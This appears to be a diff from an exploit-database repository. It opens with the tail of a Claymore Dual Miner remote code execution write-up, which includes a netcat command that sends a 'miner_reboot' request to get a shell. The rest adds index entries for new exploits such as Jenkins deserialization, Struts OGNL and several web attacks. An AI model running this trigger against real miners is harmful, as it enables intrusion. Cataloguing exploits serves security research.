+Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
+string to the miner.
+
+echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
+
+You got the shell!
+
+This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.

files_exploits.csv

@@ -5972,6 +5972,7 @@ id,file,description,date,author,type,platform,port
 44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
 44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
 44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
+44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9714,7 +9715,7 @@ id,file,description,date,author,type,platform,port
 44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
 44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
-44633,exploits/linux/local/44633.rb,"Libuser - roothelper Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
+44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16490,7 +16491,10 @@ id,file,description,date,author,type,platform,port
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
 44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
-44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
+44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
+44638,exploits/windows/remote/44638.txt,"Nanopool Claymore Dual Miner 7.3 - Remote Code Execution",2018-05-17,ReverseBrain,remote,windows,
+44642,exploits/linux/remote/44642.rb,"Jenkins CLI - HTTP Java Deserialization (Metasploit)",2018-05-17,Metasploit,remote,linux,8080
+44643,exploits/multiple/remote/44643.rb,"Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)",2018-05-17,Metasploit,remote,multiple,8080
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39321,3 +39325,7 @@ id,file,description,date,author,type,platform,port
 44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
 44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
 44634,exploits/java/webapps/44634.txt,"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting",2018-05-16,"SEC Consult",webapps,java,
+44636,exploits/php/webapps/44636.txt,"NodAPS 4.0 - SQL injection / Cross-Site Request Forgery",2018-05-17,L0RD,webapps,php,
+44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware,
+44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,
+44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux,